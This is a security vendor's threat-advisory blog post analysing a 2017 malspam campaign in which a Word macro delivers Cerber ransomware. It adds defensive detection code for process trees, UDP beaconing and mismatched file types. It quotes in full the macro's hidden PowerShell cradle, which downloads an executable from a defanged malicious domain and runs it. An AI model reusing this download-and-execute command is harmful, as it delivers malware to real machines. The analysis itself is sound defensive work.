Rajas Save

Malspam Delivers Cerber Ransomware July-2017

Blog Post created by Rajas Save on Jul 21, 2017

During the early weeks of July, malspam activity delivered a malicious Word document that uses a macro to download and execute a Cerber ransomware payload. This is not a new delivery vector: Office macros are routinely abused to download and drop malware, and victims are easily tricked into enabling and running them.


Submitting the delivery document to the What's This File service shows more information about the malicious Word document.


This activity, and more, is captured in the process tree below, which shows the series of events that led to downloading and executing a Cerber payload:


The macro in the Word document calls PowerShell, which connects to the malware's distribution site, downloads an executable and runs it:


powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}


Line-By-Line analysis of PowerShell Command:

powershell.exe

  • Launches the PowerShell host (powershell.exe, found under System32\WindowsPowerShell\v1.0). Everything that follows is passed to it on the command line.

-WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;

  • -WindowStyle Hidden runs PowerShell without a visible console window, so nothing is shown to the victim.
  • The variable $wscript is created and assigned a new WScript.Shell COM instance.
  • WScript.Shell exposes the OS shell methods (running programs, reading the registry, creating shortcuts), which substantially extends what a script can do. Note that $wscript is never referenced again in this command; it is dead code left over from the downloader template.

$webclient = new-object System.Net.WebClient;

  • The variable $webclient is created and assigned a System.Net.WebClient instance.
  • The WebClient class provides methods that let the object send and receive data from a web server identified by a URL.

$random = new-object random;

  • Creates a new System.Random instance ($random), used below to pick the dropped file's name.

$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',')

  • $urls is assigned the result of Split(','): an array of URLs, here containing a single entry that points to a file hosted on the malicious domain. The f=1.jpg parameter makes the request look like an image download, but the server returns an executable.
  • Because of the Split, the same template can string together several payloads hosted on different domains by separating their URLs with commas; the loop below tries each one in turn.

$name = $random.next(1, 65536);

  • $name is assigned a random integer from $random. System.Random.Next treats its upper bound as exclusive, so the value lies between 1 and 65535.

$path = $env:temp + '\' + $name + '.exe';

  • $path is built from the %TEMP% environment variable (the user's AppData\Local\Temp folder), a backslash, the random number and an .exe extension, e.g. C:\Users\<user>\AppData\Local\Temp\5356.exe.

foreach($url in $urls){try{

  • The script iterates through each URL in $urls and runs the commands in the try block against it.

$webclient.DownloadFile($url.ToString(), $path);

  • DownloadFile fetches the content at the current URL and writes it to the path held in $path. It throws an exception on any failure (DNS error, HTTP error, write failure), which is what the catch block below handles.

Start-Process $path;break;}

  • Start-Process launches the downloaded executable. If the download and launch succeed, break leaves the foreach loop so no further URLs are tried. If Start-Process fails (for example because the file is not a valid executable), the exception is caught below.

catch{write-host $_.Exception.Message;}

  • If anything in the try block throws, the exception message is written with write-host to the console, which is hidden, and the loop moves on to the next URL instead of terminating. Together with -WindowStyle Hidden this keeps the script silent: the victim never sees an error, and a dead first URL does not stop the infection.
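The parent-child relationship shown in the process tree and the command-line building blocks walked through above can be turned into a simple triage rule. The Python below is an added example written for this article, not code from the original advisory or from RSA NetWitness. It runs over constructed Sysmon-style process-creation records; the record field names, the Office-parent and script-host lists, the indicator regexes and the alert threshold are all assumptions, and the only real string is the defanged command line quoted above.

```python
import re

# Defanged command line quoted in the advisory (the only real string in this example).
CMDLINE = (
    "powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;"
    "$webclient = new-object System.Net.WebClient;$random = new-object random;"
    "$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',');"
    "$name = $random.next(1, 65536);$path = $env:temp + '\\' + $name + '.exe';"
    "foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);"
    "Start-Process $path;break;}catch{write-host $_.Exception.Message;}}"
)

# Constructed Sysmon-style process-creation records (assumed field names, not real logs).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": CMDLINE},
    {"ParentImage": r"C:\Windows\explorer.exe",            # admin at a console: benign
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile Get-ChildItem C:\Temp"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",                  # Word printing: benign
     "CommandLine": "splwow64.exe 12288"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# One regex per building block of the download cradle analysed above.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),  # "-w hidden" is an accepted abbreviation
    "webclient":     re.compile(r"System\.Net\.WebClient", re.I),
    "download":      re.compile(r"\.Download(?:File|String|Data)\(", re.I),
    "temp_drop":     re.compile(r"\$env:temp", re.I),
    "launch":        re.compile(r"Start-Process|Invoke-Item|Invoke-Expression|\bIEX\b", re.I),
}

# Loose URL match that also catches defanged hosts such as dastonond[.]top.
URL_RE = re.compile(r"https?://[^\s'\"<>;]+", re.I)


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_commandline(cmdline):
    """Return the cradle indicators that fire and every URL embedded in the command."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    return {"indicators": hits, "urls": URL_RE.findall(cmdline)}


def triage(events, min_indicators=3):
    """Alert when an Office app spawns a script host whose command line looks like a cradle."""
    alerts = []
    for ev in events:
        parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
        if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
            continue
        result = analyze_commandline(ev["CommandLine"])
        if len(result["indicators"]) >= min_indicators:
            alerts.append({"parent": parent, "child": child, **result})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"{alert['parent']} -> {alert['child']}: {alert['indicators']}")
        for url in alert["urls"]:
            print("  payload URL:", url)
```

Requiring both the Office-to-script-host parent relationship and several cradle indicators keeps the rule quiet on an administrator running PowerShell from Explorer, while the extracted URL goes straight into the blocklist.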


In our case the "JPG" it downloads is actually a PE file, saved as C:\Users\<user>\AppData\Local\Temp\5356.exe. It runs and spawns a number of processes to gather information and to encrypt files on the infected system.


VirusTotal analysis of the dropped file confirms it is Cerber ransomware:


Once the ransomware has successfully installed, post-infection traffic shows the typical Cerber beaconing: a UDP spray to addresses across 77.12.57.0/24 on port 6893.
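The beaconing pattern described above can be detected from flow records by counting how many distinct hosts in one /24 a single source reaches on the same UDP port within a short window. The Python below is an added example, not code from the original advisory or from NetWitness; the flow records are constructed, and the threshold of 32 targets and the 10-second window are assumptions. Only the subnet and port come from the traffic noted above.

```python
from collections import defaultdict
from ipaddress import ip_network


def make_sample_flows():
    """Constructed flow records (src, dst, proto, dport, ts); not captured traffic."""
    flows = []
    # Infected host spraying UDP/6893 across 77.12.57.0/24, one datagram every 10 ms.
    for i in range(60):
        flows.append(("10.0.0.15", f"77.12.57.{i + 1}", "udp", 6893, 1000.0 + i * 0.01))
    # Ordinary DNS from another host, and from the infected host before infection.
    for i in range(5):
        flows.append(("10.0.0.22", "10.0.0.1", "udp", 53, 1000.0 + i))
    flows.append(("10.0.0.15", "10.0.0.1", "udp", 53, 999.0))
    # A slow scanner that never reaches the threshold inside one window.
    for i in range(40):
        flows.append(("10.0.0.30", f"192.0.2.{i + 1}", "udp", 6893, 2000.0 + i * 5.0))
    return flows


def detect_udp_spray(flows, min_targets=32, window=10.0):
    """Alert when one source hits at least min_targets distinct hosts in a single /24
    on the same UDP port within `window` seconds (both thresholds are assumptions)."""
    buckets = defaultdict(list)  # (src, subnet, dport) -> [(ts, dst), ...]
    for src, dst, proto, dport, ts in flows:
        if proto != "udp":
            continue
        subnet = str(ip_network(f"{dst}/24", strict=False))
        buckets[(src, subnet, dport)].append((ts, dst))

    alerts = []
    for (src, subnet, dport), hits in buckets.items():
        hits.sort()
        j = 0
        for i in range(len(hits)):
            while hits[i][0] - hits[j][0] > window:  # slide the window start forward
                j += 1
            if len({d for _, d in hits[j:i + 1]}) >= min_targets:
                alerts.append({"src": src, "subnet": subnet, "dport": dport,
                               "distinct_targets": len({d for _, d in hits})})
                break  # one alert per (source, subnet, port) is enough
    return alerts


if __name__ == "__main__":
    for a in detect_udp_spray(make_sample_flows()):
        print(f"cerber-style beacon: {a['src']} -> {a['subnet']} udp/{a['dport']} "
              f"({a['distinct_targets']} hosts)")
```

Keying on (source, destination /24, destination port) rather than on the port alone is what separates this spray from ordinary UDP traffic to a single server; the sliding window keeps a slow scanner below the threshold.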


Current NetWitness detection flags both the payment domain (key.dga.tld pattern) as 'cerber ransomware' and the UDP spray as 'cerber beacon' in the <Indicators of Compromise> meta field.


Additionally, the <File Analysis> flags 'js eval no docwrite' and 'exe filetype but not exe extension' should be noted as indicators of possibly malicious files; the latter fires here because the content served as 1.jpg is a PE executable.
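The 'exe filetype but not exe extension' flag, and the earlier observation that the downloaded "1.jpg" is really a PE file, both come down to comparing a file's magic bytes with its name. The Python below is an added example written for this article, not the NetWitness implementation. The sample files are constructed in memory (a minimal MZ/PE header and a JPEG prefix), not the Cerber payload, and the magic-byte and extension tables are a small assumed subset.

```python
import struct

# Magic bytes for a few common types (a constructed subset, not NetWitness's table).
MAGICS = [
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"%PDF", "pdf"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),  # legacy .doc/.xls container
    (b"PK\x03\x04", "zip"),                          # also .docx/.xlsx
]

# Extensions that are consistent with each detected type.
EXT_FOR_TYPE = {
    "exe":  {"exe", "dll", "sys", "scr", "cpl", "ocx"},
    "jpeg": {"jpg", "jpeg"},
    "png":  {"png"},
    "pdf":  {"pdf"},
    "ole2": {"doc", "xls", "ppt", "msg"},
    "zip":  {"zip", "docx", "xlsx", "pptx", "jar"},
}


def looks_like_pe(data):
    """True if data starts with a DOS header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def detect_filetype(data):
    """Classify content by its bytes, ignoring the file name entirely."""
    if looks_like_pe(data):
        return "exe"
    for magic, name in MAGICS:
        if data.startswith(magic):
            return name
    return "unknown"


def extension_mismatch(filename, data):
    """Return a flag such as 'exe filetype but not exe extension', or None if consistent."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    ftype = detect_filetype(data)
    if ftype == "unknown" or ext in EXT_FOR_TYPE[ftype]:
        return None
    return f"{ftype} filetype but not {ftype} extension"


def make_fake_pe():
    """Constructed 128-byte stand-in for a PE file: MZ stub, e_lfanew=0x40, PE signature.
    It is not executable code, just enough header for the check above."""
    buf = bytearray(0x80)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\x00\x00"
    return bytes(buf)


FAKE_PE = make_fake_pe()                        # stands in for what the server returned as "1.jpg"
FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 28  # a genuine-looking JPEG prefix

if __name__ == "__main__":
    for name, data in [("1.jpg", FAKE_PE), ("5356.exe", FAKE_PE), ("photo.jpg", FAKE_JPEG)]:
        print(f"{name}: {detect_filetype(data)} -> {extension_mismatch(name, data)}")
```

Checking the e_lfanew pointer rather than just the two MZ bytes avoids flagging every file that happens to start with "MZ", and following the pointer with a bounded slice keeps a malformed header from raising.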


All the IOCs are added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

For more information on Cerber ransomware, its evolution and detection techniques using RSA NetWitness, please check the following RSA Link articles:


Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.
